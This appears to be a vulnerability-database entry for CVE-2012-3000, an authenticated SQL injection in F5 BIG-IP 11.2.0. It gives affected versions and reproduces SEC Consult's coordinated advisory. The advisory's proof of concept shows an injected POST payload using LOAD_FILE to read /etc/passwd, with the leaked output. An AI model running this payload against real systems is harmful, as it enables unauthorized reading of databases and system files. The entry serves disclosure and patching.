ID

VAR-E-201301-0068


CVE

cve_id:CVE-2012-3000

Trust: 0.8

sources: BID: 57500 // PACKETSTORM: 119739

TITLE

F5 BIG-IP 11.2.0 SQL Injection

Trust: 0.5

sources: PACKETSTORM: 119739

DESCRIPTION

F5 BIG-IP versions 11.2.0 and below suffer from a remote SQL injection vulnerability.

Trust: 0.5

sources: PACKETSTORM: 119739

AFFECTED PRODUCTS

vendor:f5model:big-ipscope:eqversion:11.2.0

Trust: 0.5

vendor:f5model:big-ip psmscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.2.00

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.0.00

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.2.00

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.0.00

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.0.0

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip womscope:neversion:11.0

Trust: 0.3

vendor:f5model:big-ip womscope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip womscope:neversion:10.0

Trust: 0.3

vendor:f5model:big-ip womscope:neversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:neversion:9.4.80

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:neversion:11.3

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:neversion:11.0

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip psmscope:neversion:11.3

Trust: 0.3

vendor:f5model:big-ip psmscope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip psmscope:neversion:9.4.8

Trust: 0.3

vendor:f5model:big-ip psm hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip psm hf3scope:neversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip ltm hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip ltm hf3scope:neversion:11.2

Trust: 0.3

vendor:f5model:big-ip ltmscope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip ltmscope:neversion:9.4.8

Trust: 0.3

vendor:f5model:big-ip ltmscope:neversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip link controllerscope:neversion:9.4.80

Trust: 0.3

vendor:f5model:big-ip link controllerscope:neversion:11.3

Trust: 0.3

vendor:f5model:big-ip link controller hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip link controller hf3scope:neversion:11.2

Trust: 0.3

vendor:f5model:big-ip link controllerscope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip gtmscope:neversion:11.3

Trust: 0.3

vendor:f5model:big-ip gtm hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip gtmscope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip gtmscope:neversion:9.4.8

Trust: 0.3

vendor:f5model:big-ip gtm hf3scope:neversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:neversion:11.3

Trust: 0.3

vendor:f5model:big-ip edge gateway hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip edge gateway hf3scope:neversion:11.2

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip asmscope:neversion:9.4.80

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:neversion:11.2.00

Trust: 0.3

vendor:f5model:big-ip asmscope:neversion:10.2.40

Trust: 0.3

vendor:f5model:big-ip asmscope:neversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip asm hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip apmscope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip apmscope:neversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip apm hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip apm hf3scope:neversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:neversion:11.3

Trust: 0.3

vendor:f5model:big-ip analytics hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip analytics hf3scope:neversion:11.2

Trust: 0.3

vendor:f5model:big-ip hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip hf3scope:neversion:11.2

Trust: 0.3

sources: BID: 57500 // PACKETSTORM: 119739

EXPLOIT

SEC Consult Vulnerability Lab Security Advisory < 20130122-1 >
=======================================================================
title: SQL Injection
product: F5 BIG-IP
vulnerable version: <=11.2.0
fixed version: 11.2.0 HF3
11.2.1 HF3
CVE number: CVE-2012-3000
impact: Medium
homepage: http://www.f5.com/
found: 2012-09-03
by: S. Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance. From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility—and ensures your applications
are fast, secure, and available."

URL: http://www.f5.com/products/big-ip/

Vulnerability overview/description:
-----------------------------------
A SQL injection vulnerability exists in a BIG-IP component. This enables an
authenticated attacker to access the MySQL database with the rights of MySQL
user "root" (= highest privileges).

Furthermore an attacker can access files in the file system with the rights of
the "mysql" OS user.

Proof of concept:
-----------------
The following exploit shows how files can be extracted from the file system:

POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 119

{
"id": 2,
"defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) --
x" }

Note: target fields are only VARCHAR(60) thus MID() is used for extracting
data.

A request to /sam/admin/reports/php/getSettings.php returns the data:

HTTP/1.1 200 OK
...

{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}

Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.

Successful exploitation was possible with Application Security (ASM) or Access
Policy (APM) enabled.

Vendor contact timeline:
------------------------
2012-10-04: Sending advisory draft and proof of concept.
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and
11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.

Solution:
---------
Update to 11.2.0 HF3 or 11.2.1 HF3.

Workaround:
-----------
No workaround available.

Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF S. Viehböck / @2013

Trust: 0.5

sources: PACKETSTORM: 119739

EXPLOIT HASH

LOCAL

SOURCE

md5: a7a55720e2e38546a4cf71e1619e01ad
sha-1: 77861ce1dd6eb2d2fd3c6767a994de70224fbeaa
sha-256: 075964bff42decb58985c82a10aee244147936d50217dd3f3028ad2948fdffaf
md5: a7a55720e2e38546a4cf71e1619e01ad

Trust: 0.5

sources: PACKETSTORM: 119739

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 119739

TYPE

sql injection

Trust: 0.5

sources: PACKETSTORM: 119739

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:sql injection

Trust: 0.5

sources: PACKETSTORM: 119739

CREDITS

S. Viehbock

Trust: 0.5

sources: PACKETSTORM: 119739

EXTERNAL IDS

db:NVDid:CVE-2012-3000

Trust: 0.8

db:PACKETSTORMid:119739

Trust: 0.5

db:BIDid:57500

Trust: 0.3

sources: BID: 57500 // PACKETSTORM: 119739

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2012-3000

Trust: 0.5

url:http://www.f5.com/products/big-ip/

Trust: 0.3

url:https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130122-1_f5_big-ip_sql_injection_v10.txt

Trust: 0.3

url:http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14154.html

Trust: 0.3

sources: BID: 57500 // PACKETSTORM: 119739

SOURCES

db:BIDid:57500
db:PACKETSTORMid:119739

LAST UPDATE DATE

2022-07-27T10:03:19.681000+00:00


SOURCES UPDATE DATE

db:BIDid:57500date:2015-03-19T08:21:00

SOURCES RELEASE DATE

db:BIDid:57500date:2013-01-22T00:00:00
db:PACKETSTORMid:119739date:2013-01-22T23:57:22